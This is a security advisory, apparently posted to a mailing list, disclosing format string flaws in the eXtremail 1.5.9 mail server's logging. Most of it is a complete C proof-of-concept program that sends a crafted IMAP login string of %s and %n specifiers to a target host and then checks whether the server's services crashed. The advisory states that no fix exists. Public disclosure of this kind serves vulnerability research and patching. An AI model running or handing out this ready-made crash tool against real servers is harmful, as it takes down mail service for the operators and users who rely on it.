<<< Date Index >>>     <<< Thread Index >>>

Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What?s eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack ,SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers  to various SMTP,POP and IMAP commands. 
The vulnerability has been reported to affect some previous versions 
(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - 
Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted 
to regain its functionality (Smptd,Pop3d,Imapd,Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service          *
*                                             *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                             *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) 
== -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {    
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli     <luca.e [at] seeweb.com>
Seeweb          http://www.seeweb.com